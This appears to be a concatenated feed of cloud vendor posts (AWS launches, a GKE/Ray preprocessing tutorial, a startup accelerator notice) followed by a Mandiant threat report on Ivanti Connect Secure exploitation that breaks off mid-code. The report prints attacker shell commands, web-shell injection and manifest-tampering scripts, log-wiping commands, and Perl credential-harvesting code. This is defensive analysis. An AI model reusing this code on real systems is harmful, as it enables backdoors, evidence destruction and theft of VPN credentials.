Amazon Connect Contact Lens now provides free trials for first-time users of conversational analytics and performance evaluations. Customers new to conversational analytics for voice will receive a free trial with no charge for the first 100,000 voice minutes per month for the first two months. In addition, customers using Contact Lens performance evaluations for the first time will receive a 30-day free trial that begins the day they submit their first performance evaluation. The free trials enable first-time customers to pilot Contact Lens conversational analytics and evaluations in their environment without incurring additional costs.
With this launch, the new Contact Lens free trials are available in all AWS Regions supported by Contact Lens. To learn more, please visit our documentation and our webpage. For information about Contact Lens pricing, please visit our pricing page.
Amazon Managed Streaming for Apache Kafka Connect (Amazon MSK Connect) APIs now come with AWS PrivateLink support, allowing you to invoke Amazon MSK Connect APIs from within your Amazon Virtual Private Cloud (VPC) without traversing the public internet.
By default, all communication between your MSK Clusters and your Amazon MSK Connect connectors is private, and your data never traverses the internet. Similar to AWS PrivateLink support for Amazon MSK APIs, this launch enables clients to invoke MSK Connect APIs via a private endpoint. This allows client applications with strict security requirements to perform MSK Connect specific actions such as creating connectors from new or existing custom plugins, listing and describing connector details, or updating connectors, without the need to communicate over a public connection.
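As an illustration, the sketch below creates an interface endpoint for the MSK Connect API with boto3. The VPC, subnet, and security group IDs are placeholders, and the service name follows the usual com.amazonaws.<region>.<service> convention, which you should verify with describe_vpc_endpoint_services.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Create an interface VPC endpoint so MSK Connect API calls stay inside the VPC.
response = ec2.create_vpc_endpoint(
    VpcEndpointType="Interface",
    VpcId="vpc-0123456789abcdef0",                       # placeholder
    ServiceName="com.amazonaws.us-east-1.kafkaconnect",  # assumed name; verify before use
    SubnetIds=["subnet-0123456789abcdef0"],              # placeholder
    SecurityGroupIds=["sg-0123456789abcdef0"],           # placeholder
    PrivateDnsEnabled=True,
)
print(response["VpcEndpoint"]["VpcEndpointId"])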
AWS PrivateLink support for Amazon MSK Connect is available in all AWS Regions where Amazon MSK Connect is available. To get started, follow the directions provided in the AWS PrivateLink documentation. To learn more about Amazon MSK Connect, visit the Amazon MSK Connect documentation.
Today, AWS announced the opening of a new AWS Direct Connect location within the Telehouse Bangkok, Thailand data center. By connecting your network to AWS at the new Bangkok location, you gain private, direct access to all public AWS Regions (except those in China), AWS GovCloud Regions, and AWS Local Zones. This site is the second AWS Direct Connect location within Thailand. The new Direct Connect location offers dedicated 10 Gbps and 100 Gbps connections with MACsec encryption available.
AWS also announced the addition of 10 Gbps and 100 Gbps MACsec services at the existing TCC Bangkok Direct Connect location.
The Direct Connect service enables you to establish a private, physical network connection between AWS and your data center, office, or colocation environment. These private connections can provide a more consistent network experience than those made over the public internet.
For more information on the over 145 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages. Or, visit our getting started page to learn more about how to purchase and deploy Direct Connect.
Amazon SageMaker, a fully managed machine learning service, announces the general availability of Amazon Q Developer in SageMaker Studio Code Editor. SageMaker Studio customers now get generative AI assistance powered by Q Developer right within their Code Editor (Visual Studio Code – Open Source) IDE. With Q Developer, data scientists and ML engineers can access expert guidance on SageMaker features, code generation, and troubleshooting. This boosts productivity by eliminating tedious online searches and documentation review, leaving more time to deliver differentiated business value.
Data scientists and ML engineers using Code Editor in SageMaker Studio can kick off their model development lifecycle with Amazon Q Developer. They can use the chat capability to discover and learn how to leverage SageMaker features for their use case without having to sift through extensive documentation. Users can also generate code tailored to their needs to jump-start the development process. Further, they can use Q Developer to get in-line code suggestions and conversational assistance to edit, explain, and document their code in Code Editor. They can also leverage Q Developer for step-by-step troubleshooting guidance when running into errors. This integration empowers data scientists and ML engineers to accelerate their workflow, enhance productivity, and deliver ML models more efficiently, streamlining the machine learning development process.
This feature is available in all commercial AWS regions where SageMaker Studio is available.
The exponential growth of machine learning models brings with it ever-increasing datasets. This data deluge creates a significant bottleneck in the Machine Learning Operations (MLOps) lifecycle, as traditional data preprocessing methods struggle to scale. The preprocessing phase, which is critical for transforming raw data into a format suitable for model training, can become a major roadblock to productivity.
To address this challenge, in this article, we propose a distributed data preprocessing pipeline that leverages the power of Google Kubernetes Engine (GKE), a managed Kubernetes service, and Ray, a distributed computing framework for scaling Python applications. This combination allows us to efficiently preprocess large datasets, handle complex transformations, and accelerate the overall ML workflow.
The data preprocessing imperative
The data preprocessing phase in MLOps is foundational, directly impacting the quality and performance of machine learning models. Preprocessing includes tasks such as data cleaning, feature engineering, scaling, and encoding, all of which are essential for ensuring that models learn effectively from the data.
When data preprocessing requires a large number of operations, it can become a bottleneck that slows down the overall pipeline. In the following example, we walk through a dataset preprocessing use case that includes uploading several images to a Google Cloud Storage bucket. This involves up to 140,000 operations that, when executed serially, create a bottleneck and take over 8 hours to complete.
Dataset
For this example, we use a pre-crawled dataset consisting of 20,000 products.
Data preprocessing steps
The dataset has 15 different columns. The columns of interest are: 'uniq_id', 'product_name', 'description', 'brand', 'product_category_tree', 'image', and 'product_specifications'.
Besides dropping null values and duplicates, we perform the following steps on the relevant columns (a pandas sketch of these steps follows the list):
description: Clean up Product Description by removing stop words and punctuation.
product_category_tree: Split into different columns.
product_specifications: Parse the Product Specifications into Key:Value pairs.
image: Parse the list of image URLs. Validate each URL and download the image.
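Here is a minimal pandas sketch of these steps. The file path and stop-word list are placeholders, and the assumptions about how the category tree and image columns are encoded are illustrative rather than taken from the original pipeline.

import ast
import string

import pandas as pd

# A small illustrative stop-word list; a real pipeline would use a fuller one.
STOP_WORDS = {"a", "an", "the", "and", "or", "of", "to", "in", "for", "with"}

def clean_description(text: str) -> str:
    """Remove punctuation and stop words from a product description."""
    text = text.translate(str.maketrans("", "", string.punctuation)).lower()
    return " ".join(w for w in text.split() if w not in STOP_WORDS)

df = pd.read_csv("products.csv")          # placeholder path to the 20,000-product dataset
df = df.dropna(subset=["description", "image"]).drop_duplicates(subset=["uniq_id"])

df["description"] = df["description"].astype(str).map(clean_description)

# Assumes the category tree is stored as a string-encoded list like
# '["Home >> Kitchen >> Cookware"]' with ">>" separators.
df["categories"] = df["product_category_tree"].map(
    lambda v: ast.literal_eval(v)[0].split(" >> ") if pd.notna(v) else []
)

# Assumes the image column is a string-encoded list of URLs.
df["image_urls"] = df["image"].map(lambda v: ast.literal_eval(v) if pd.notna(v) else [])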
Now, consider the scenario where a preprocessing task involves extracting multiple image URLs from each row of a large dataset and uploading the images to a Cloud Storage bucket. This might sound straightforward, but with a dataset that contains 20,000+ rows, each with potentially up to seven URLs, the process can become incredibly time-consuming when executed serially in Python. In our experience, such a task can take upwards of eight hours to complete!
Solution: Implement parallelism for scalability
To tackle this scalability issue, we turn to parallelism. By breaking the dataset into smaller chunks and distributing the processing across multiple threads, we can drastically reduce the overall execution time. We chose to use Ray as our distributed computing platform.
Ray: Distributed computing simplified
Ray is a powerful framework designed for scaling Python applications and libraries. It provides a simple API for distributing computations across multiple workers, making it a strong choice for implementing parallel data preprocessing pipelines.
In our specific use case, we leverage Ray to distribute the Python function responsible for downloading images from URLs to Cloud Storage buckets across multiple Ray workers. Ray’s abstraction layer handles the complexities of worker management and communication, allowing us to focus on the core preprocessing logic.
Ray’s core capabilities include:
Task parallelism: Ray enables arbitrary functions to be executed asynchronously as tasks on separate Python workers, providing a straightforward way to parallelize our image download process.
Actor model: Ray’s “actors” offer a way to encapsulate stateful computations, making them suitable for complex preprocessing scenarios where shared state might be necessary.
Simplified scaling: Ray seamlessly scales from a single machine to a full-blown cluster, making it a flexible solution for varying data sizes and computational needs.
Implementation details
We ran the data preprocessing on GKE using the accelerated-platforms repository, which provides the code to build your GKE cluster and configure prerequisites, such as running Ray on the cluster, so you can run the data preprocessing job as a container. The job consisted of three phases (a sketch of the core logic follows the list):
1. Dataset partitioning: We divide the large dataset into smaller chunks.
The 20,000 rows of input data were divided into 101 smaller chunks, each with 199 rows. Each chunk is assigned to a Ray task, which is executed on a Ray worker.
2. Ray task distribution: We created Ray remote tasks. Ray creates and manages the workers and distributes the tasks onto them.
3. Parallel data processing: The Ray tasks prepare the data and download the images to Cloud Storage concurrently.
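The following sketch shows the core of phases 1 through 3: chunking the rows and downloading images to Cloud Storage from Ray remote tasks. It is illustrative rather than the repository's actual code; the bucket name is a placeholder, and the DataFrame is assumed to come from the preprocessing sketch earlier.

import ray
import requests
from google.cloud import storage

ray.init()  # on GKE, this connects to the Ray cluster configured for the job

BUCKET_NAME = "preprocessed-product-images"  # placeholder bucket

@ray.remote
def process_chunk(rows):
    """Download every image URL in a chunk of rows and upload it to Cloud Storage."""
    client = storage.Client()
    bucket = client.bucket(BUCKET_NAME)
    uploaded = 0
    for row in rows:
        for i, url in enumerate(row["image_urls"]):
            resp = requests.get(url, timeout=30)
            if resp.status_code == 200:
                blob = bucket.blob(f"{row['uniq_id']}/{i}.jpg")
                blob.upload_from_string(resp.content, content_type="image/jpeg")
                uploaded += 1
    return uploaded

# Split ~20,000 rows into chunks of ~199 and process them concurrently.
records = df.to_dict("records")            # df from the preprocessing sketch above
chunks = [records[i:i + 199] for i in range(0, len(records), 199)]
futures = [process_chunk.remote(chunk) for chunk in chunks]
print("images uploaded:", sum(ray.get(futures)))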
Results
By leveraging Ray and GKE, we achieved a dramatic reduction in processing time. The preprocessing time for 20,000 rows decreased from over 8 hours to just 17 minutes, representing a speedup of approximately 23x. If the data size increases, you can adjust the batch size and use Ray autoscaling to achieve similar performance.
Data preprocessing challenges no more
Distributed data preprocessing with GKE and Ray provides a robust and scalable solution for addressing the data preprocessing challenges faced by modern ML teams. By leveraging the power of parallelism and cloud infrastructure, we can accelerate data preparation, reduce bottlenecks, and empower data scientists and ML engineers to focus on model development and innovation. To learn more, run the deployment that demonstrates this data preprocessing use case using Ray on a GKE cluster.
To help close the gender gap among startup founders, we are opening up applications for the Google for Startups Accelerator: Women Founders program for Europe & Israel. This ten-week accelerator is designed to support Seed to Series A women-led AI startups with expert mentorship, technical support, and tailored workshops that lay the groundwork for scaling.
Fostering a more inclusive AI ecosystem
As AI continues to revolutionize industries, ensuring that diverse voices lead the way is critical for driving innovation that benefits everyone. The Google for Startups Accelerator: Women Founders program is working to level the playing field, empowering women-led startups to bring fresh, diverse perspectives to the future of AI.
Margaryta Sivakova, the CEO of Legal Nodes, leveraged support from the program to scale her business: “Through Google for Startups Accelerator, we learned to build, improve, and scale AI solutions, focusing on production-grade AI, MLOps, and the right infrastructure for rapid scaling.”
Maria Terzi, the CEO of Malloc Privacy, received one-on-one support to help users protect their data on their phones: “We joined Google for Startups Accelerator to enhance our technology and gained much more—insights on pricing, sales, UI/UX design, people management, and fast-paced operations.”
Apply now
Women-led startups building with AI in Europe and Israel can apply until January 24 for the 2025 cohort of the Google for Startups Accelerator: Women Founders program.
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently analyzing multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog draws on insights collectively derived from analysis of these infected devices; we have not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler, and the SPAWNSNAIL SSH backdoor). The deployment of the SPAWN ecosystem of malware following the targeting of Ivanti Connect Secure appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in the Attribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM, which are not currently linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e., SPAWN, DRYHOOK, and PHASEJAM), but as of publishing this report we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
Exploitation
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Repeated requests to the appliance have been observed prior to exploitation, likely to determine the appliance version before attempting exploitation.
Version detection has been observed using the Host Checker Launcher and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations in the exploitation of CVE-2025-0282, the exploit and script generally perform the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
Use sed to remove specific log entries from the debug and application logs
Reenable SELinux
Remount the drive
Immediately after exploitation, the threat actor disables SELinux, uses iptables to block syslog forwarding, and remounts the root partition to enable writing malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
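Where live response on a suspect appliance is possible, the side effects of these commands can be checked directly. The following is a minimal, hypothetical triage sketch using standard Linux utilities; it is not tooling referenced in this report and may need adjustment for the restricted ICS shell:
# Hypothetical triage commands (standard utilities, adjust for the appliance environment)
getenforce                                             # "Permissive" may indicate a prior setenforce 0
iptables -S OUTPUT | grep -E -- '--dport (514|6514)'   # DROP rules here match the observed syslog blocking
mount | grep ' / '                                     # a root partition remounted read-write is suspicious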
Malware Staging
Mandiant observed the threat actor using the shell script to echo a Base64-encoded script into /tmp/.t and then set execution permissions on the file. The figure below shows the contents of /tmp/.t.
Next, the threat actor writes a Base64-encoded ELF binary into /tmp/svb. The ELF binary first uses setuid to set the owner of the process to root. It then executes /tmp/s (PHASEJAM), which inherits the root privileges of the parent process. The threat actor then uses dd to overwrite the svb file with zeros and removes /tmp/.t.
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi and restAuth.cgi files, block system upgrades by modifying the DSUpgrade.pm file, and overwrite the remotedebug executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi and restAuth.cgi as a function named AccessAllow(). The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64 module to encode and decode commands and data.
The following summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters:
Command 1: Decodes the code provided in the HTTP_CODE environment variable and writes the result into a file named test.p under the /tmp directory. Executes the file using /bin/bash and returns the output of the command execution to the attacker.
Command 2: Similar to command 1, but executes the provided commands using /home/bin/dsrunpriv and the patched remotedebug file.
Command 3: Writes a file with a name specified in the HTTP_CODE environment variable under the /tmp directory, with content provided in the License parameter. This functionality allows the attacker to upload arbitrary files on the compromised appliance.
Command 4: Reads the content of a file specified in the Base64-decoded HTTP_CODE environment variable and returns the content to the attacker. This enables the attacker to exfiltrate data from the affected appliance.
Command 5: Similar to command 3, but overwrites the target file instead of appending to it, in case it already exists on the appliance.
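Because the web shell is inserted as a named function into known files, a simple, hypothetical hunting check can reuse the details above; the commands below are standard utilities, not tooling from this report:
# Hypothetical: search the legitimate CGI files for the injected AccessAllow() function
grep -n 'sub AccessAllow' /home/webserver/htdocs/dana-na/jam/getComponent.cgi /home/webserver/htdocs/dana-na/auth/restAuth.cgi
# Hypothetical: backup copies created by PHASEJAM may also remain on disk
ls -l /home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak /home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak 2>/dev/null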
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function named processUpgradeDisplay() into the /home/perl/DSUpgrade.pm file. The functionality is intended to simulate an upgrade process that involves thirteen steps, each taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug to remotedebug.bak and writes a new /home/bin/remotedebug shell script that hooks calls to remotedebug. The brief shell script checks for a new -c parameter that allows remote code execution by the web shell; all other parameters are passed through to remotedebug.bak.
The following provides an abridged PHASEJAM sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' || echo "$sh" >>
/home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/etc/manifest/manifest -a |grep
-oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' || echo "$sh" >>
/home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl
dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYm
FzaCAiJEAiCmVsc2UKCWV4ZWMgL2hvbWUvYmluL3JlbW90ZWRlYnV
nLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
/home/perl/DSUpgrade.pm
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
/home/perl/DSUpgrade.pm
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
pkill cgi-server
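For readability, the Base64-encoded payload that the sample above writes to /home/bin/remotedebug decodes to the following short wrapper script:
#!/bin/bash
# Decoded from the Base64 blob in the PHASEJAM sample above
if [ "$1" == "-c" ]; then
	bash "$@"
else
	exec /home/bin/remotedebug.bak "$@"
fi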
Anti-Forensics
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using dmesg and removing entries from the debug logs that are generated during the exploit
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^\x00]\{1\}\x00[^\x00]*web server[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x00]\{1\}\x00[^\x00]*AUT24604[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x00]\{1\}\x00[^\x00]*SYS31048[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x01]\{1\}\x01[^\x01]*SYS31376[^\x01]*\x01//g' log.events.vc0
sed -i 's/\x01[^\x01]\{2,3\}6[^\x01]*ERR10073[^\xff]*\x09[^\x01]\{1\}\x01/\x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin\/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin\/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators by rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Because the upgrade is blocked, any installed backdoors or tools left by the threat actor persist on the currently running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed to insert malicious Perl code into DSUpgrade.pm to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay() function, which is stored in the shell variable $up, is appended to DSUpgrade.pm.
The modification occurs within a function in DSUpgrade.pm responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay(), together with the early return, renders the legitimate popen() call that executes /pkg/dspkginstall unreachable. The following provides the relevant excerpt from DSUpgrade.pm after the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
}
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay() function before the legitimate upgrade command executes. The figure below provides an excerpt of the inserted processUpgradeDisplay() function that displays a fake HTML upgrade progress bar, using the sleep command to add dots every second to mimic a running process.
Recent versions of Ivanti Connect Secure have a built-in Integrity Checker Tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of compromise. The ICT uses a manifest during its scanning process, containing a list of the expected file paths on the system along with their expected SHA256 hashes. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
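A minimal, hypothetical spot check for this modification reuses the file path, function name, and hashing command shown above; note that because the on-box manifest may already have been re-stamped, any hash comparison should be made against a known-good manifest or package from Ivanti rather than /home/etc/manifest/manifest:
# Hypothetical: the injected helper should not exist in a clean DSUpgrade.pm
grep -n 'processUpgradeDisplay' /home/perl/DSUpgrade.pm
# Hypothetical: recompute the hash, then compare against a known-good manifest rather than the on-box copy
/home/bin/openssl dgst -sha256 /home/perl/DSUpgrade.pm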
The threat actor copies the VERSION file from the mounted upgrade partition (tmp/root/home/VERSION) to the current version partition (/home/VERSION). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
SPAWNANT and its supporting components can persist across system upgrades. SPAWNANT hijacks the execution flow of dspkginstall, a binary used during the system upgrade process, by exporting a malicious snprintf function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade by ensuring that it and its components are migrated to the new upgrade partition (mounted on /tmp/data/ during a legitimate system upgrade).
SPAWNANT sets the LD_PRELOAD environment variable to itself (libupgrade.so) within DSUpgrade.pm on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so and use SPAWNANT’s malicious exported snprintf function before other libraries.
ENV{"LD_PRELOAD"} = "libupgrade.so"
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi on the upgrade partition. The web shell uses system() to execute the value passed to a hard-coded query parameter. The following provides the relevant excerpt of the inserted web shell.
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
After the threat actor established an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including publicly available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor’s command-and-control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
SPAWNMOLE
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes; otherwise, the remaining benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by the attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance, including built-in tools on the ICS appliance such as nmap and dig to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also used to move laterally within the network, including to Active Directory servers, through SMB or RDP. The observed attacker commands were prefaced by the following lines:
LDAP queries were executed using /tmp/lmdbcerr, with output directed to randomly named files in the /tmp directory. Password, host, and query were passed as command line arguments.
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb. The resulting tar archive is then renamed to masquerade as a CSS file located within /home/webserver/htdocs/dana-na/css/.
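A short, hypothetical way to spot such a staged archive is to check whether files under the directory named above are actually stylesheets; the file(1) check below is an assumption about available tooling, not something referenced in this report:
# Hypothetical: genuine stylesheets should be text; a tar archive will be flagged by file(1)
find /home/webserver/htdocs/dana-na/css/ -type f -name '*.css' -exec file {} \; | grep -viE 'ascii|text'
# Hypothetical: unusually large or recently modified "CSS" files are also worth review
find /home/webserver/htdocs/dana-na/css/ -type f -name '*.css' \( -size +1M -o -mtime -30 \) -ls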
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm that belongs to the Ivanti Connect Secure environment in order to harvest successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm and reads its content into a buffer. The malware then uses regular expressions to find and replace several lines of code.
The *setPrompt assignment is replaced with the following Perl code:
# *setPrompt
$ds_g="";
sub setPrompt{
eval{
my $res=@_[1]."=".@_[2]."\n";
$ds_g .= $res;
};
return DSAuthc::RealmSignin_setPrompt(@_);
}
$ds_e="";
The injected setPrompt routine captures the second and the third parameter, combines them into the format <param2>=<param3> and then assigns the produced string to a global variable named $ds_g. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
$ds_g1="";
sub encode_base64 ($;$)
{
my $res = "";
my $eol = $_[1];
$eol = "\n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(\S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
}
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."\n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e1="";
The code above contains two subroutines named encode_base64 and runSignin. The former takes a string and Base64-encodes it, while the latter intercepts the sign-in process and, upon a successful attempt, writes the username and password saved in the global variable $ds_g to a file named cmdmmap.kuwMW under the /tmp directory. The <username>=<password> string is first RC4-encrypted with a hard-coded key and then Base64-encoded with the encode_base64 routine before being saved into the cmdmmap.kuwMW file.
The last code replacement, shown as follows, is the same as the code above but targets a different sign-in scheme, named EBSL in the code.
# *runSigninEBSL
$ds_g2="";
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
